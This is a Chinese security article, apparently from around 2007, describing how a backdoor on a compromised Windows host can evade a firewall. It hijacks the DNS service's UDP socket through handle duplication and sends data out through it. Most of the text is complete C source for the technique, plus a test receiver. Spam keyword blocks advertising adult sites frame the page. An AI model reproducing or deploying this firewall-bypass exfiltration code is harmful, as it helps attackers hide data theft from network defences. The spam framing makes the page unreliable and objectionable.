国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

一種新的穿透防火墻的數(shù)據(jù)傳輸技術(shù)
2007-01-04   

使用該技術(shù)背景:

在目標主機安放后門,需要將數(shù)據(jù)傳輸出去,同時數(shù)據(jù)很重要,動作不能太大。其他情況“嚴重”不推薦使用該技術(shù)(后面我會講到為什么)。

針對目前防火墻的一些情況,如果自己的進程開一個端口(甚至是新建套接字)肯定被攔。相反,有一點我們也很清楚:被防火墻驗證的進程在傳送數(shù)據(jù)時永遠不會被攔。所以,我的思路很簡單:將其他進程中允許數(shù)據(jù)傳輸?shù)奶捉幼志浔脼橐延谩?

過程如下:

1. 找出目標進程
2. 找出SOCKET句柄
2. 用DuplicateHandle()函數(shù)將其SOCKET轉(zhuǎn)換為能被自己使用
3. 用轉(zhuǎn)換后的SOCKET進行數(shù)據(jù)傳輸

上面的過程寫的很簡單,但是實際實現(xiàn)起來還是存在一些問題(后面再做討論),而且從上面的實現(xiàn)方法也可以看出一些不爽的地方:在目標進程的SOCKET不能是TCP,因為TCP的句柄已經(jīng)跟外面建立了連接,所以只能是UDP。針對不同系統(tǒng)不同進程我們很難定位一個穩(wěn)定的進程SOCKET。

看到上面這些,你有點喪氣了對不對,哈哈。 再想一想,其實我們有一條真正的通羅馬的“黃金大道”。

我們知道只要一臺計算機連上了網(wǎng)絡(luò),那么有一種數(shù)據(jù)傳輸是肯定不會被攔截的,那就是DNS。你能想像域名解析數(shù)據(jù)都被攔了造成的結(jié)果嗎? 嘿嘿, 既然這個是永遠不會被攔的, 而且它又是UDP傳輸, 我們就拿他開刀。

下面是通過直接控制DNS進程(其實也就是svchost.exe,不過對應(yīng)用戶名是NETWORK SERVICE)進行數(shù)據(jù)傳輸?shù)睦印>幊讨谐霈F(xiàn)了很多問題,比方說獲取svchost對應(yīng)用戶名時沒有權(quán)限(但是能夠操作LOCAL SERVICE),在句柄值為0x2c時進行g(shù)etsockname時會停止運行等等。具體解決方法請細看注釋部分。

CODE:
/*++

Made By ZwelL
[email]zwell@sohu.com[/email]
2005.4.12
--*/

#include 
#include 
#include 

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status)       ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef LONG   NTSTATUS;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
  ULONG         ProcessId;
  UCHAR         ObjectTypeNumber;
  UCHAR         Flags;
  USHORT         Handle;
  PVOID         Object;
  ACCESS_MASK     GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

BOOL LocateNtdllEntry ( void )
{
  BOOL   ret       = FALSE;
  char   NTDLL_DLL[] = "ntdll.dll";
  HMODULE ntdll_dll   = NULL;


  if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
  {
    printf( "GetModuleHandle() failed");
    return( FALSE );
  }
  if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress
( ntdll_dll, "ZwQuerySystemInformation" ) ) )
  {
    goto LocateNtdllEntry_exit;
  }
  ret = TRUE;

LocateNtdllEntry_exit:

  if ( FALSE == ret )
  {
    printf( "GetProcAddress() failed");
  }
  ntdll_dll = NULL;
  return( ret );
}


/*++
This routine is used to get a process's username from it's SID
--*/
BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)
{
  // sanity checks and default value
  if (pUserSid == NULL)
    return false;
  strcpy(szUserName, "?");

  SID_NAME_USE   snu;
  TCHAR       szUser[_MAX_PATH];
  DWORD       chUser = _MAX_PATH;
  PDWORD       pcchUser = &chUser; 
  TCHAR       szDomain[_MAX_PATH];
  DWORD       chDomain = _MAX_PATH;
  PDWORD       pcchDomain = &chDomain;

  // Retrieve user name and domain name based on user's SID.
  if (
    ::LookupAccountSid(
    NULL, 
    pUserSid, 
    szUser, 
    pcchUser, 
    szDomain, 
    pcchDomain, 
    &snu
    )
    )
  {
    wsprintf(szUserName, "%s", szUser);
  }
  else
  {
    return false;
  }

  return true;
} 


/*++

This routine is used to get the DNS process's Id

Here, I use WTSEnumerateProcesses to get process user Sid, 
and then get the process user name. Beacause as it's a "NETWORK SERVICE", 
we cann't use OpenProcessToken to catch the DNS process's token information,
even if we has the privilege in catching the SYSTEM's.

--*/
DWORD GetDNSProcessId()
{
  PWTS_PROCESS_INFO pProcessInfo = NULL;
  DWORD         ProcessCount = 0;
  char         szUserName[255];
  DWORD         Id = -1;

  if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))
  {
    // dump each process description
    for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)
    {

        if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )
        {
          GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);
          if( strcmp(szUserName, "NETWORK SERVICE") == 0)
          {
            Id = pProcessInfo[CurrentProcess].ProcessId;
            break;
          }
        }
    }

    WTSFreeMemory(pProcessInfo);
  }

  return Id;
}


/*++
This doesn't work as we know, sign...
but you can use the routine for other useing...
--*/
/*
BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)
{
  HANDLE hProcess = NULL, 
        hAccessToken = NULL;
  TCHAR InfoBuffer[1000], szDomainName[200];
  PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
  DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;
  SID_NAME_USE snu;

  hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);
  if(hProcess == NULL)
  {
    printf("OpenProcess wrong");
    CloseHandle(hProcess);
    return false;
  }

  if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))
  {
    printf("OpenProcessToken wrong:%08x", GetLastError());
    return false;
  }

  GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,
    1000, &dwInfoBufferSize);

  LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,
    &dwAccountSize,szDomainName, &dwDomainSize, &snu);

  if(hProcess)
    CloseHandle(hProcess);
  if(hAccessToken)
    CloseHandle(hAccessToken);
  return true;
}*/


/*++
Now, it is the most important stuff... ^_^
--*/
SOCKET GetSocketFromId (DWORD PID)
{
  NTSTATUS               status;
  PVOID                 buf   = NULL;
  ULONG                 size = 1;
  ULONG                 NumOfHandle = 0;
  ULONG                 i;
  PSYSTEM_HANDLE_INFORMATION   h_info = NULL;
  HANDLE   sock = NULL;
  DWORD   n;

  buf=malloc(0x1000);
  if(buf == NULL)
  {
    printf("malloc wrong\n");
    return NULL;
  }
  status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );
  if(STATUS_INFO_LENGTH_MISMATCH == status)
  {
    free(buf);
    buf=malloc(n);
    if(buf == NULL)
    {
        printf("malloc wrong\n");
        return NULL;
    }
    status = ZwQuerySystemInformation( 0x10, buf, n, NULL);
  }
  else
  {
    printf("ZwQuerySystemInformation wrong\n");
    return NULL;
  }

  NumOfHandle = *(ULONG*)buf;

  h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

  for(i = 0; i0)   // if port > 0, then we can use it
            break;
        }
    }
    catch(...)
    {
        continue;
    }
  }

  if ( buf != NULL )
  {
    free( buf );
  }
  return (SOCKET)sock;
}


/*++
This is not required...
--*/
BOOL EnablePrivilege (PCSTR name)
{
  HANDLE hToken;
  BOOL rv;

  TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
  LookupPrivilegeValue (
    0,
    name,
    &priv.Privileges[0].Luid
    );

  priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

  OpenProcessToken(
    GetCurrentProcess (),
    TOKEN_ADJUST_PRIVILEGES,
    &hToken
    );

  AdjustTokenPrivileges (
    hToken,
    FALSE,
    &priv,
    sizeof priv,
    0,
    0
    );

  rv = GetLastError () == ERROR_SUCCESS;

  CloseHandle (hToken);
  return rv;
}

void main() 
{
  WSADATA wsaData;
  char   testbuf[255];
  SOCKET   sock;
  sockaddr_in RecvAddr;

  int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
  if (iResult != NO_ERROR)
    printf("Error at WSAStartup()\n");

  if(!LocateNtdllEntry())
    return;

  if(!EnablePrivilege (SE_DEBUG_NAME))
  {
    printf("EnablePrivilege wrong\n");
    return;
  }

  sock = GetSocketFromId(GetDNSProcessId());
  if( sock==NULL)
  {
    printf("GetSocketFromId wrong\n");
    return;
  }

  //Change there value...
  RecvAddr.sin_family = AF_INET;
  RecvAddr.sin_port = htons(5555); 
  RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");

  if(SOCKET_ERROR == sendto(sock, 
        "test", 
        5, 
        0, 
        (SOCKADDR *) &RecvAddr, 
        sizeof(RecvAddr)))
  {
    printf("sendto wrong:%d\n", WSAGetLastError());
  }
  else
  {
    printf("send ok... Have fun, right? ^_^\n");
  }
  
  getchar();

  //WSACleanup();
  return;
}
[Copy to clipboard]

很早以前我就有這個想法了,只是一直沒有去實現(xiàn)。在上面的代碼中,因為要找出DNS進程句柄,而svchost.exe又有多個,所以以用戶名來進行判斷,本來是用OpenProcessToken,但是怎么也不行。所以換個方法,用到了wtsapi32庫函數(shù)。

再用下面的代碼測試:

CODE:
/*++
UdpReceiver
--*/
#include 
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

void main() 
{
WSADATA wsaData;
SOCKET RecvSocket;
sockaddr_in RecvAddr;
int Port = 5555;
char RecvBuf[1024];
int BufLen = 1024;
sockaddr_in SenderAddr;
int SenderAddrSize = sizeof(SenderAddr);

//-----------------------------------------------
// Initialize Winsock
WSAStartup(MAKEWORD(2,2), &wsaData);

//-----------------------------------------------
// Create a receiver socket to receive datagrams
RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

//-----------------------------------------------
// Bind the socket to any address and the specified port.
RecvAddr.sin_family = AF_INET;
RecvAddr.sin_port = htons(Port);
RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);

bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));

//-----------------------------------------------
// Call the recvfrom function to receive datagrams
// on the bound socket.
printf("Receiving datagrams...\n");
while(1)
{
  recvfrom(RecvSocket, 
    RecvBuf, 
    BufLen, 
    0, 
    (SOCKADDR *)&SenderAddr, 
    &SenderAddrSize);
  printf("%s\n", RecvBuf);
}

//-----------------------------------------------
// Close the socket when finished receiving datagrams
printf("Finished receiving. Closing socket.\n");
closesocket(RecvSocket);

//-----------------------------------------------
// Clean up and exit.
printf("Exiting.\n");
WSACleanup();
return;
}
[Copy to clipboard]

測試步驟:

1. 在一臺機器上執(zhí)行UdpReceiver。

2. 在安裝防火墻的機器上執(zhí)行第一個程序。

責任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001


熱詞搜索:

上一篇:Cisco 路由器安全配置必用10條命令
下一篇:不出四步 通過巧妙設(shè)置確保局域網(wǎng)安全

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
色综合久久88色综合天天6| 国产精品亚洲а∨天堂免在线| 国产视频一区二区在线| 欧美一级久久久| 91精品国产91久久综合桃花| 欧美亚洲动漫制服丝袜| 欧美亚洲综合一区| 欧美亚州韩日在线看免费版国语版| 99久久夜色精品国产网站| 91在线国产观看| 色偷偷久久一区二区三区| 91久久奴性调教| 91国偷自产一区二区开放时间| 色偷偷成人一区二区三区91| 色狠狠综合天天综合综合| 在线观看日韩高清av| 欧美日韩国产a| 日韩片之四级片| 国产色婷婷亚洲99精品小说| 国产精品女上位| 亚洲精品国产无天堂网2021| 亚洲成av人影院在线观看网| 日本欧美一区二区三区乱码| 蜜桃传媒麻豆第一区在线观看| 精品在线观看视频| 99视频在线观看一区三区| 欧美优质美女网站| 精品成人在线观看| 亚洲欧美自拍偷拍色图| 亚洲18影院在线观看| 精品中文av资源站在线观看| 99视频精品免费视频| 欧美日韩一二三| 久久久一区二区三区| 亚洲欧美精品午睡沙发| 六月丁香婷婷久久| eeuss鲁一区二区三区| 欧美男男青年gay1069videost| 日韩欧美精品在线视频| 国产精品视频你懂的| 婷婷久久综合九色综合伊人色| 国产一区啦啦啦在线观看| 99riav久久精品riav| 精品三级在线看| 亚洲黄色小视频| 国产成人丝袜美腿| 欧美精品日韩精品| 亚洲精选视频在线| 国产伦理精品不卡| 777色狠狠一区二区三区| 国产精品成人在线观看| 免费国产亚洲视频| 欧美视频中文字幕| 亚洲欧洲精品一区二区三区| 久久99精品国产91久久来源| 在线一区二区观看| 国产精品久久久久久久第一福利| 麻豆免费精品视频| 在线成人免费视频| 亚洲精品福利视频网站| 成人av免费观看| 国产校园另类小说区| 免费成人在线影院| 91精品在线观看入口| 亚洲香肠在线观看| 欧美综合色免费| 亚洲丝袜美腿综合| 99久久精品国产麻豆演员表| 国产亚洲婷婷免费| 国产在线精品一区二区夜色| 欧美一区二区三区四区高清| 亚洲国产精品精华液网站| 99在线热播精品免费| 国产精品成人免费精品自在线观看 | 成人激情小说网站| 国产欧美日韩精品a在线观看| 蜜桃91丨九色丨蝌蚪91桃色| 欧美一区二区精品久久911| 首页国产欧美日韩丝袜| 91麻豆精品国产91久久久资源速度 | 26uuu国产电影一区二区| 视频一区中文字幕国产| 欧美调教femdomvk| 日韩精品免费专区| 日韩欧美另类在线| 国内精品久久久久影院一蜜桃| 精品国产在天天线2019| 国模无码大尺度一区二区三区 | 国产老妇另类xxxxx| 久久日韩粉嫩一区二区三区| 国产在线观看免费一区| 国产亚洲精久久久久久| 91亚洲精品一区二区乱码| 亚洲黄色免费网站| 91麻豆精品国产91| 国产成人综合在线| 亚洲精选视频在线| 日韩一级片网址| 国产不卡在线视频| 亚洲一区二区在线免费观看视频| 欧美日韩国产色站一区二区三区| 日日摸夜夜添夜夜添国产精品| 日韩精品在线看片z| 成人涩涩免费视频| 亚洲www啪成人一区二区麻豆| 日韩欧美一级二级三级| 成人午夜av在线| 亚洲成人一区在线| 久久久久久久精| 欧美在线观看视频一区二区| 蜜桃视频在线观看一区二区| 国产午夜亚洲精品不卡| 欧美视频在线播放| 国产成人精品免费看| 亚洲高清视频在线| 欧美激情艳妇裸体舞| 欧美日韩精品是欧美日韩精品| 不卡的电影网站| 日韩黄色免费电影| 亚洲免费在线观看| 久久嫩草精品久久久精品| 日本国产一区二区| 国产成人亚洲精品青草天美| 亚洲成人激情综合网| 亚洲欧洲在线观看av| 精品久久一区二区| 欧美美女直播网站| 99久久国产综合精品色伊| 精品一区二区三区视频在线观看| 一区二区三区在线免费视频| 久久久噜噜噜久久中文字幕色伊伊| 日本精品一区二区三区高清 | 在线观看区一区二| 国产成人综合在线观看| 蜜臀av性久久久久蜜臀aⅴ流畅 | 亚洲精品欧美激情| 欧美激情一区二区三区蜜桃视频| 欧美一区二区三区视频免费播放 | 中文字幕一区日韩精品欧美| 欧美r级在线观看| 91精品免费在线观看| 91久久精品网| 高清不卡在线观看| 美女一区二区三区在线观看| 中文字幕一区二区三区精华液| 欧美一区二区啪啪| 欧美视频精品在线观看| 99精品久久免费看蜜臀剧情介绍| 精品一区二区三区在线播放| 性做久久久久久久久| 亚洲精品videosex极品| 亚洲天天做日日做天天谢日日欢| 国产亚洲综合在线| 久久久99久久精品欧美| 精品国产一区二区三区久久久蜜月| 欧美精品成人一区二区三区四区| 欧美亚洲高清一区| 555www色欧美视频| 欧美日韩成人在线| 日韩视频一区二区三区 | 久久精品国产第一区二区三区| 视频一区视频二区中文字幕| 亚洲成a人v欧美综合天堂下载| 亚洲一区二区四区蜜桃| 午夜精品一区在线观看| 午夜精品一区二区三区三上悠亚| 视频一区在线视频| 韩国av一区二区三区四区| 国产一区二区美女| 99亚偷拍自图区亚洲| 精品视频免费看| 精品国产乱码久久久久久浪潮| 久久老女人爱爱| 亚洲色图制服丝袜| 香蕉久久夜色精品国产使用方法 | 国产一区二区在线视频| 国产suv精品一区二区883| 99国产精品久久久久| 欧美综合亚洲图片综合区| 337p亚洲精品色噜噜噜| 日韩你懂的在线播放| 欧美日韩综合不卡| 欧美肥妇毛茸茸| 久久精品无码一区二区三区| 国产性做久久久久久| 国产精品久久久久一区二区三区共| 亚洲日本成人在线观看| 亚洲电影激情视频网站| 日韩av在线播放中文字幕| 国产精品少妇自拍| 丝袜国产日韩另类美女| 精品无码三级在线观看视频| 国产精品12区| 在线成人高清不卡| 亚洲精品一线二线三线 | 风间由美一区二区三区在线观看 | 日韩高清一级片| 国产成a人亚洲| 欧美久久久久久久久中文字幕| 欧美不卡123|